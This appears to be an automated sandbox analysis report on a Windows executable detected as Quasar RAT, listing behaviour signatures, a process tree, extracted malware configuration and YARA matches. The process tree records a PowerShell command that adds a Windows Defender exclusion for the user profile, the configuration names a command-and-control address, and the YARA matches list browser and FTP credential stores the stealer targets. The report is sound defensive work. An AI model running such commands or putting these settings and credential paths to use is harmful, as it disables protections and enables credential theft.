Edit tour

Windows Analysis Report
KxgGGaiW3E.exe

Overview

General Information

Sample name:	KxgGGaiW3E.exe renamed because original name is a hash value
Original sample name:	eb0beafcb365cd20eb00ff9e19b73232.exe
Analysis ID:	1430591
MD5:	eb0beafcb365cd20eb00ff9e19b73232
SHA1:	1a4470109418e1110588d52851e320ecefcba7de
SHA256:	31b494be325fc9c97031135886454b1370e5e3608c757f74784c6b6fb2fb5c99
Tags:	64exe
Infos:

Detection

Quasar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Snort IDS alert for network traffic

Yara detected Quasar RAT

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Uses regedit.exe to modify the Windows registry

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Uncommon Svchost Parent Process

Stores files to the Windows start menu directory

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

KxgGGaiW3E.exe (PID: 6612 cmdline: "C:\Users\user\Desktop\KxgGGaiW3E.exe" MD5: EB0BEAFCB365CD20EB00FF9E19B73232)

conhost.exe (PID: 3752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3816 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ngen.exe (PID: 4204 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" MD5: 417D6EA61C097F8DF6FEF2A57F9692DF)

chrome.exe (PID: 4304 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ngen.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6204 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1980,i,18279504130272871239,1243418513114917448,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5232 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ngen.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=608 --field-trial-handle=1972,i,16479660562393968934,10937071673119511898,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

svchost.exe (PID: 5800 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

KxgGGaiW3E.exe (PID: 7424 cmdline: "C:\Users\user\KxgGGaiW3E.exe" MD5: EB0BEAFCB365CD20EB00FF9E19B73232)

conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7936 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 7516 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

ngen.exe (PID: 7388 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" MD5: 417D6EA61C097F8DF6FEF2A57F9692DF)

csc.exe (PID: 7384 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cmd.exe (PID: 7396 cmdline: "C:\Windows\System32\cmd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

regedit.exe (PID: 7412 cmdline: "C:\Windows\regedit.exe" MD5: 999A30979F6195BF562068639FFC4426)

ilasm.exe (PID: 7372 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe" MD5: 2B2AE2C9C5D693D2306EF388583B1A03)

KxgGGaiW3E.exe (PID: 2428 cmdline: "C:\Users\user\KxgGGaiW3E.exe" MD5: EB0BEAFCB365CD20EB00FF9E19B73232)

conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7132 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wmplayer.exe (PID: 4408 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" MD5: A7790328035BBFCF041A6D815F9C28DF)

chrome.exe (PID: 7196 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=wmplayer.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7640 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1876,i,14537101740333488740,3287298464352964342,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 8172 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=wmplayer.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7380 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1996,i,6191957489455060914,12654374120200284850,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Quasar RAT, QuasarRAT	Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.	APT33 Dropping Elephant Stone Panda The Gorgon Group	http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848 https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf https://asec.ahnlab.com/en/31089/	https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Malware Configuration

Threatname: Quasar

{"Version": "1.4.1", "Host:Port": "185.196.10.233:4782;", "SubDirectory": "gfgfgf", "InstallName": "gfdgfdg.exe", "MutexName": "b0fcdfbd-bdd4-4a5d-8ab1-7217539d4db6", "StartupKey": "fgfdhdgg", "Tag": "Office04", "LogDirectoryName": "Logs", "ServerSignature": "sLgsAfL2UUP6AlkFtdbXqluoDW3wMwZMc5jX/AEQ95yeOqJ/mDe6i6lW/m64mbhn2G3vN2d4I8Qtdsrk2BNrFgrax6KY4LwvCADg4iWu0OQObYe1kIVp1F920nP6DUrentMm6n8M1g8s0yh5HdxXXephIuo4I5YYucMt7gcLshmgAYmxg6+d/d0YKS2VeOfF2/u6r+XgU+ilIVnN+9UjjlZXvAheUXkEbG8ebP7qHAv/DAgmZBOJhfTnATX3mUUEEUqS3oJGqmX2s1j7k/+49o+l7SkZ42evs7mYtKNHm72CJqu0rqg9V2fm/gprhNvvqjOjmmKr+R9u3Fp2aS1qKKaaAUFd9QfBv7ZfmM8EaTUMi/saY/FxjvvLvxFxwqubJ96oCdONVu5DE/Q5zOby9y9ed9I3Jkp9FtwBnOQym4e0iVii1wCUXkpolBSyPGUp5GQdoCJDYndo9z2VBzLLEHDgAGBMmlglK/7uri3vB4faJObyyfsLSBNl0Ig/nKkRBiAIzPRxuLbPAo/YbPRJhWm5slo8SnnRihxPzjpbhTpHvilpqsdx1vxwo+c7vKPgi/zfrelosnaoPnp16aKmYfNzXQyJryygd3ApTPltaPEH9bBtU327kpGeGOHwaDC6JnN3RpAbgLnKYsUR9pzQmwxFsQF//cKI40pEDtA4myQ=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAMRnhbg+tJFMr/86nUEYyTANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MDMyMzAxMzgxNVoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAwbGZcqqvx4MOD4A+auAj/30nYgYK34sYaSqurPhQwOXONfWAFNMkPIlxW0gpPAfJ2VwEMcNiYAaFbOZCngmVn0Xs8buiLjvm67cg4zrMGtYkYjiofES6yH34I8VwCt1GNtgBAf+kfE4gnEzinTK/l1YX2iPSHjuUu7Ekdhr7Obgw09xCg05N3vgnu42Cyal6/uiIsjdTMsohcFHXrWTO/i+IIBNzP8Q1e7BkbOy59bM7xGIwHGjTx/eOLz76bqQXnedrCVKsWHkqaNikulKHEaOns6rUSMDf2wtiSGJ58PMU30KRR2G0G+KCeFzA5PvZSq32yrCGrTA1x9DoN6bLMWyVDYzsYlJrrYddlOcWp8IagnQYnPK+JZa+XKXKcJ9dkUgY4s7OySY82nQUtYG6jQFXAcIhOQFJUGp5/vbT35jBrBWUc0fiEUV0p+I1q07x7uUGwvuVIJsUgktViS0PSMFjSe08Xjr6rIgQM6yCnZwuh6FhbQrMxS3OB6h2Zh5lXpHUbBiTRUvWftjSp0kvFO4k08eVH7pRgRw8CJ7mj12TRUHi6zbZFjp9m98J7F6mZdbKk1SaiyZjbLvd30qQSq9VWpobo46l6sNVn1xGc25lEpvPm8dDccO/8OtvpQlqQ7sM4xKPpdnTFbgZZUibvJ2Sk1pN1zdxZLX1b1E3Ox0CAwEAAaMyMDAwHQYDVR0OBBYEFBWQtAUwfS2z8ujHYJdbIU1+U+9wMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAJre53r+uS0wgiLip0IQTosVSn3Dzmz9buiIfxIDSByi2wkWYKrIvBpg7VgjRsoEpNfayUfl+giSoqLTWpyX6IWVZrfG6dUeDD8inVEcjS+Szru/lZBx9IQph9jhoAaHnBTpIiuJ6CGELXwOa4iCjbbVLtPlBZEk2dIohOPkQBNmjp+aL/QHv5uqRJPeW4bfTt/v10JqaGKvwDURf/zRdxejlASpICX+mrTfcnJQHf2q29OeTtzI2dEKlZuraeZOQ2L9+BBdoVUHbPD4J9tkzfyPnTpkwwqJFhVBAuZWYnMGC0kqLPUcw3GRoEL7rjSVJbWZMZjox+oNwa99JO673IFf5ujY2yJTHJPk6q4i3D0j2EJfS0yu6NsW17AcsTxGXcyg+4iL3ytjitetS2GpDMdhCvm1cetZXskrnwMCHjSXp2vpbxQALftGpY9B/ALQHqneAG2qOJoXyoqIp7E3KdKgMYx3JlCUwuyHsY9qBjUu2oQwhL8LopB1kUOhzcKYWmI2BBit+h8AVTKM+7DlepxFvA/hijqUVwHMPZTZYWfJwSEk4mZW8IyYzeEOQzvCtaRIbaTMPmW9M9P7PqCMyqs/YBmejvT2YEXKyhFnpdL0AC0O3rEsia6qRH7qHLQ19AyyuDscYUc4T54dvUxmAEqErMbjwSMoMhSNVBBIVWeN"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000019.00000002.3309899452.0000000007E66000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000001D.00000002.2488394877.0000000000720000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000005.00000002.2184893054.0000000000720000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000012.00000002.3307610797.0000000000720000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000001D.00000002.2488394877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000005.00000002.2184893054.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000012.00000002.3307610797.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000000.00000002.2117583475.000002B6955C1000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000000.00000002.2117583475.000002B695FC1000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000D.00000002.2407170841.0000017BEF8E1000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000013.00000002.2435090839.0000020599B21000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000013.00000002.2435090839.000002059A521000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000D.00000002.2407170841.0000017BEEEE1000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: KxgGGaiW3E.exe PID: 6612	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: ngen.exe PID: 4204	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: KxgGGaiW3E.exe PID: 7424	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: svchost.exe PID: 7516	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: KxgGGaiW3E.exe PID: 2428	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: ilasm.exe PID: 7372	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: wmplayer.exe PID: 4408	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.KxgGGaiW3E.exe.2b69585a870.1.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0.2.KxgGGaiW3E.exe.2b69585a870.1.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28d09d:$x1: Quasar.Common.Messages 0x29d3c6:$x1: Quasar.Common.Messages 0x2a9a4a:$x4: Uninstalling... good bye :-( 0x2ab23f:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
0.2.KxgGGaiW3E.exe.2b69585a870.1.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2a8ffc:$f1: FileZilla\recentservers.xml 0x2a903c:$f2: FileZilla\sitemanager.xml 0x2a907e:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2a92ca:$b1: Chrome\User Data\ 0x2a9320:$b1: Chrome\User Data\ 0x2a95f8:$b2: Mozilla\Firefox\Profiles 0x2a96f4:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fb650:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2a984c:$b4: Opera Software\Opera Stable\Login Data 0x2a9906:$b5: YandexBrowser\User Data\ 0x2a9974:$b5: YandexBrowser\User Data\ 0x2a9648:$s4: logins.json 0x2a937e:$a1: username_value 0x2a939c:$a2: password_value 0x2a9688:$a3: encryptedUsername 0x2fb594:$a3: encryptedUsername 0x2a96ac:$a4: encryptedPassword 0x2fb5b2:$a4: encryptedPassword 0x2fb530:$a5: httpRealm
0.2.KxgGGaiW3E.exe.2b69585a870.1.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x163116:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2a9b34:$s3: Process already elevated. 0x28cd9c:$s4: get_PotentiallyVulnerablePasswords 0x276e58:$s5: GetKeyloggerLogsDirectory 0x29cb25:$s5: GetKeyloggerLogsDirectory 0x28cdbf:$s6: set_PotentiallyVulnerablePasswords 0x2fcc7e:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
19.2.KxgGGaiW3E.exe.20599dba870.1.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
19.2.KxgGGaiW3E.exe.20599dba870.1.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28d09d:$x1: Quasar.Common.Messages 0x29d3c6:$x1: Quasar.Common.Messages 0x2a9a4a:$x4: Uninstalling... good bye :-( 0x2ab23f:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
19.2.KxgGGaiW3E.exe.20599dba870.1.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2a8ffc:$f1: FileZilla\recentservers.xml 0x2a903c:$f2: FileZilla\sitemanager.xml 0x2a907e:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2a92ca:$b1: Chrome\User Data\ 0x2a9320:$b1: Chrome\User Data\ 0x2a95f8:$b2: Mozilla\Firefox\Profiles 0x2a96f4:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fb650:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2a984c:$b4: Opera Software\Opera Stable\Login Data 0x2a9906:$b5: YandexBrowser\User Data\ 0x2a9974:$b5: YandexBrowser\User Data\ 0x2a9648:$s4: logins.json 0x2a937e:$a1: username_value 0x2a939c:$a2: password_value 0x2a9688:$a3: encryptedUsername 0x2fb594:$a3: encryptedUsername 0x2a96ac:$a4: encryptedPassword 0x2fb5b2:$a4: encryptedPassword 0x2fb530:$a5: httpRealm
19.2.KxgGGaiW3E.exe.20599dba870.1.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x163116:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2a9b34:$s3: Process already elevated. 0x28cd9c:$s4: get_PotentiallyVulnerablePasswords 0x276e58:$s5: GetKeyloggerLogsDirectory 0x29cb25:$s5: GetKeyloggerLogsDirectory 0x28cdbf:$s6: set_PotentiallyVulnerablePasswords 0x2fcc7e:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
13.2.KxgGGaiW3E.exe.17bef17a870.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
13.2.KxgGGaiW3E.exe.17bef17a870.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28d09d:$x1: Quasar.Common.Messages 0x29d3c6:$x1: Quasar.Common.Messages 0x2a9a4a:$x4: Uninstalling... good bye :-( 0x2ab23f:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
13.2.KxgGGaiW3E.exe.17bef17a870.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2a8ffc:$f1: FileZilla\recentservers.xml 0x2a903c:$f2: FileZilla\sitemanager.xml 0x2a907e:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2a92ca:$b1: Chrome\User Data\ 0x2a9320:$b1: Chrome\User Data\ 0x2a95f8:$b2: Mozilla\Firefox\Profiles 0x2a96f4:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fb650:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2a984c:$b4: Opera Software\Opera Stable\Login Data 0x2a9906:$b5: YandexBrowser\User Data\ 0x2a9974:$b5: YandexBrowser\User Data\ 0x2a9648:$s4: logins.json 0x2a937e:$a1: username_value 0x2a939c:$a2: password_value 0x2a9688:$a3: encryptedUsername 0x2fb594:$a3: encryptedUsername 0x2a96ac:$a4: encryptedPassword 0x2fb5b2:$a4: encryptedPassword 0x2fb530:$a5: httpRealm
13.2.KxgGGaiW3E.exe.17bef17a870.0.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x163116:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2a9b34:$s3: Process already elevated. 0x28cd9c:$s4: get_PotentiallyVulnerablePasswords 0x276e58:$s5: GetKeyloggerLogsDirectory 0x29cb25:$s5: GetKeyloggerLogsDirectory 0x28cdbf:$s6: set_PotentiallyVulnerablePasswords 0x2fcc7e:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
13.2.KxgGGaiW3E.exe.17befad2b38.1.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
13.2.KxgGGaiW3E.exe.17befad2b38.1.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28d09d:$x1: Quasar.Common.Messages 0x29d3c6:$x1: Quasar.Common.Messages 0x2a9a4a:$x4: Uninstalling... good bye :-( 0x2ab23f:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
13.2.KxgGGaiW3E.exe.17befad2b38.1.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2a8ffc:$f1: FileZilla\recentservers.xml 0x2a903c:$f2: FileZilla\sitemanager.xml 0x2a907e:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2a92ca:$b1: Chrome\User Data\ 0x2a9320:$b1: Chrome\User Data\ 0x2a95f8:$b2: Mozilla\Firefox\Profiles 0x2a96f4:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fb650:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2a984c:$b4: Opera Software\Opera Stable\Login Data 0x2a9906:$b5: YandexBrowser\User Data\ 0x2a9974:$b5: YandexBrowser\User Data\ 0x2a9648:$s4: logins.json 0x2a937e:$a1: username_value 0x2a939c:$a2: password_value 0x2a9688:$a3: encryptedUsername 0x2fb594:$a3: encryptedUsername 0x2a96ac:$a4: encryptedPassword 0x2fb5b2:$a4: encryptedPassword 0x2fb530:$a5: httpRealm
13.2.KxgGGaiW3E.exe.17befad2b38.1.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x163116:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2a9b34:$s3: Process already elevated. 0x28cd9c:$s4: get_PotentiallyVulnerablePasswords 0x276e58:$s5: GetKeyloggerLogsDirectory 0x29cb25:$s5: GetKeyloggerLogsDirectory 0x28cdbf:$s6: set_PotentiallyVulnerablePasswords 0x2fcc7e:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
0.2.KxgGGaiW3E.exe.2b6961b2b38.0.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0.2.KxgGGaiW3E.exe.2b6961b2b38.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.KxgGGaiW3E.exe.2b6961b2b38.0.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ee9d:$x1: Quasar.Common.Messages 0x29f1c6:$x1: Quasar.Common.Messages 0x2ab84a:$x4: Uninstalling... good bye :-( 0x2ad03f:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
0.2.KxgGGaiW3E.exe.2b6961b2b38.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aadfc:$f1: FileZilla\recentservers.xml 0x2aae3c:$f2: FileZilla\sitemanager.xml 0x2aae7e:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab0ca:$b1: Chrome\User Data\ 0x2ab120:$b1: Chrome\User Data\ 0x2ab3f8:$b2: Mozilla\Firefox\Profiles 0x2ab4f4:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd450:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab64c:$b4: Opera Software\Opera Stable\Login Data 0x2ab706:$b5: YandexBrowser\User Data\ 0x2ab774:$b5: YandexBrowser\User Data\ 0x2ab448:$s4: logins.json 0x2ab17e:$a1: username_value 0x2ab19c:$a2: password_value 0x2ab488:$a3: encryptedUsername 0x2fd394:$a3: encryptedUsername 0x2ab4ac:$a4: encryptedPassword 0x2fd3b2:$a4: encryptedPassword 0x2fd330:$a5: httpRealm
